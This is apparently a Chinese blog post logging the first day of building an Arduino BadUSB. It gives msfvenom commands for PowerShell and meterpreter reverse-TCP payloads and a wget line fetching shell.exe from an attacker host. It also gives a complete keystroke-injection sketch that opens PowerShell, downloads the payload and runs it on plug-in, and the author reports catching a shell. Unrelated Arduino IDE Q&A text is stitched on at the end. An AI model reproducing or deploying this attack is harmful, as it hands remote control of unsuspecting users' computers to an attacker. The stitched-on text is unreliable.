arduino安全 bad-usb开发记录 第一天

前言:最近不是不想更新,很多事情等着我去搞,我的人生又不是只有网络安全...马上我就会更新靶机系列了。

很早之前就了解到bad-usb这个神奇的东西,其中的原理其实很便于理解,本来想在网上找找优秀的教程,但是不知道为什么这个只有一些前几年的开源程序和一些新闻之类的,可能实在是太危险了,限制很多,我只能自己去摸索。

其原理是将虚拟键盘的引导程序写入开发板,arduino的开发板是非常新手的开发板,使用起来简单,本人不太会嵌入式开发,所以直接从网上买了个已经写好引导程序的usb,30块,不贵,就当是简单体验一下嵌入式开发和一些特殊的安全技术吧。

ardunio开发可以使用官方的ide,是开源免费的,也可以使用vscode上面的插件,我直接使用了官方的插件,你要是对这个开发感兴趣,要做一些非常复杂的项目建议使用vscode进行开发,但是环境之类的配置起来还是有点繁琐的。

先说说思路。

我们目前要做到的第一个最终目标是当有人将这个usb插入电脑时,可以直接在公网中下载我们已经进行免杀好的反弹shell(暂时不考虑留后门,程序太大了,影响成功率,可以后期维持在re_shell中交互完成自动化)。

首先是木马准备,这里先不使用一些shellcode加载器的混淆,因为没有程序给我们进行加载。

只能使用最简单最原始的反弹shell。

当然这里我们有两种常用的木马程序。

一种是我们powershell的脚本ps1文件,一种是最基本的exe文件。

但是由于windows的一些限制,用ps1可能有点安全策略问题,当然,我们也能够克服,只不过前期没必要深入到这里。

msfvenom -a x86 --platform Windows -p windows/powershell_reverse_tcp LHOST=192.168.31.3 LPORT=4444 -e cmd/powershell_base64 -i 3 -f raw -o shell.ps1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.31.3 LPORT=1234 -f exe > shell.exe

我们先使用exe的方法,思路是架设攻击机器的下载站,然后客户机下载下来执行。在攻击机器上收到反弹的shell。

wget http://http://192.168.31.3:1234/shell.exe

以下是本人使用的代码,很简单,在arduino IDE中开发的。注意一些事情,delay的时间要具体实践,越慢越能够确保成功执行程序,越快越能够在现实中发挥作用,如果你发现你的程序编译后跟实际效果不符合,首先试着将速度调慢。 

#include <Keyboard.h>

void setup() {
  //等待usb稳定
  delay(500);

  //开始
  Keyboard.begin();

  //按下 Win + R
  Keyboard.press(KEY_LEFT_GUI);
  Keyboard.press('r');
  delay(100);
  Keyboard.releaseAll();

  
  Keyboard.print("powershell");
  delay(100);

  // 按下回车键,启动 PowerShell
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();

  //等待 PowerShell 打开
  delay(500);

  //下载shell.exe
  Keyboard.print("wget http://http://192.168.91.130:12345/shell.exe");

  //按下回车键执行命令
  Keyboard.press(KEY_RETURN);
  delay(500);
  Keyboard.releaseAll();

  //执行shell.exe
  Keyboard.print("shell.exe");

  //按下回车键执行命令
  Keyboard.press(KEY_RETURN);
  delay(100);
  Keyboard.releaseAll();

  //停止键盘模拟
  Keyboard.end();
}

void loop() {
  //留空
}

 上传后显示类似以下的信息是成功上传,本人看到红色以为是报错了,找了30分钟问题,最后问了问chatgpt,发现这是正确的信息...90

 最后在准备好的windows server 2022关闭安全措施(混淆和加密暂时不考虑,后期酌情加入),插入u盘成功执行代码,本地nc监听,成功获得shell。

  • 9
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
### 回答1: Arduino 1.8.9是一个基于开源技术的集成开发环境(IDE),专门用于编写和上传代码到Arduino开发板上。它适用于Windows操作系统。 Arduino 1.8.9集成了编写、编译和上传代码的功能,使得开发者能够快速地使用Arduino开发开发各种项目。通过Arduino IDE,我们可以使用Arduino编程语言来编写代码,该语言基于C和C++,并提供了一系列的库函数,方便开发者进行各种操作。 Arduino 1.8.9 IDE提供了一个简单直观的图形界面,使得用户能够轻松使用它,即使是对编程不熟悉的新手也能迅速上手。通过IDE,用户可以创建一个新的项目,编写代码,调试和上传到Arduino开发板进行运行。IDE还提供了丰富的示例代码,帮助开发者实现各种功能,例如控制LED灯、读取传感器数据、控制电机等。 Arduino 1.8.9的特点不仅仅局限于简单的编程环境,它还支持与其他软件和硬件平台的集成,如Processing和Raspberry Pi等。这使得Arduino开发变得更加灵活和强大,可以扩展到更多领域和应用。 总之,Arduino 1.8.9是一个功能强大且易于使用的开发环境,适用于Windows用户。它为开发者提供了一种简单的方式来编写和上传代码到Arduino开发板上,使得Arduino项目开发变得更加便捷和高效。 ### 回答2: Arduino-1.8.9-windows是Arduino软件的一个版本。Arduino是开源的硬件平台,可以用于创建各种交互式项目。Arduino软件是用于编程和上传代码到Arduino板上的工具。 Arduino-1.8.9版本是Arduino软件的一个更新版本,它在之前的版本基础上进行了一些改进和修复。这个版本提供了一个更稳定和易于使用的环境,使用户能够更方便地进行Arduino开发Arduino-1.8.9版本具有直观的用户界面,让新手也能轻松上手。它提供了一个简单的编码编辑器,支持语法高亮和自动完成功能,使编码更加容易。在编码完成后,用户可以通过Arduino软件将代码上传到Arduino板上,并实时监视和调试程序。 Arduino-1.8.9版本还为用户提供了一个丰富的库,包含了各种传感器、执行器和其他模块的驱动程序,用户可以直接使用这些库来完成他们的项目。此外,Arduino软件还支持用户自定义库和扩展,使用户能够根据自己的需求来扩展功能。 总的来说,Arduino-1.8.9-windows是一个功能强大且易于使用的软件版本,它提供了一个完整的开发环境,帮助用户快速上手和完成Arduino项目。无论是初学者还是专业开发者,都可以利用这个版本来实现他们的创意和构建各种有趣的交互式项目。 ### 回答3: Arduino是一种常用的开源电子平台,主要用于制作和控制各种物理设备。Arduino提供了一个开发环境,可以编写并上传代码到Arduino板上,从而实现各种电子项目。 Arduino-1.8.9-Windows是Arduino的一个特定版本,适用于Windows操作系统。这个版本包含了Arduino的IDE(集成开发环境),它是一个图形化界面工具,用于编写、调试和上传代码到Arduino板上。 Arduino-1.8.9-Windows版本提供了一些新的特性和改进,例如更好的兼容性和稳定性,更容易使用的用户界面以及更好的性能。这个版本还包括了许多库和示例代码,方便用户更快地开始项目开发,并提供了广泛的文档和社区支持。 使用Arduino-1.8.9-Windows,用户可以通过简单的拖放操作添加所需要的库和代码文件,然后编写自己的代码,并通过USB连接将代码上传到Arduino开发板上。用户可以使用Arduino-1.8.9-Windows来制作各种有趣的项目,例如温度传感器、光线探测器、机器人等。 总之,Arduino-1.8.9-Windows是Arduino平台的一个特定版本,为Windows用户提供了一个方便的开发环境,用于编写、调试和上传代码到Arduino板上,从而实现各种电子项目的开发
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值